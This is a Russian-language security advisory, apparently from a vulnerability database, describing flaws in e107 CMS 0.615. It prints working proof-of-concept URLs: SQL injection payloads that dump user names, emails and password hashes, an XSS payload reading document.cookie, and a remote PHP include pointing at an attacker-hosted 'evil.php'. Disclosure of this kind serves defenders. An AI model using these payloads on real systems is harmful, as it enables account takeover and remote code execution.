Дата публикации: | 31.05.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 22135 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: e107 0.615
Описание: Несколько уязвимостей обнаружена в e107. Удаленный пользователь может выполнить SQL команды и выполнить XSS нападение. В некоторых случаях, удаленный пользователь может выполнить произвольный PGP код на целевой системе. Также удаленный пользователь может раскрыть инсталляционный путь. 1. SQl инъекция: http://localhost/e107_0615/content.php?content.99/* */UNION/**/SELECT/**/null,null,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null, null,null,null/**/FROM/**/e107_user/**/ WHERE/**/user_id=1/* http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null,null,null,null,null, null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/nul l,null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null, null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*2. XSS: http://localhost/e107_0615/e107_plugins/clock_menu/clock _menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]Поле "logged name" в "email article to a friend" и "submit news" также уязвимо к XSS. 3. PHP include: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://[attacker]/evil.php4. Раскрытие пути: http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php http://localhost/e107_0615/e107_plugin s/backend_menu/backend_menu.php http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php URL производителя:http://www.e107.org/ Решение:Некоторые уязвимости устранены в 0.616. |
|
Ссылки: | [waraxe-2004-SA#031 - Multiple vulnerabilities in e107 version 0.615] |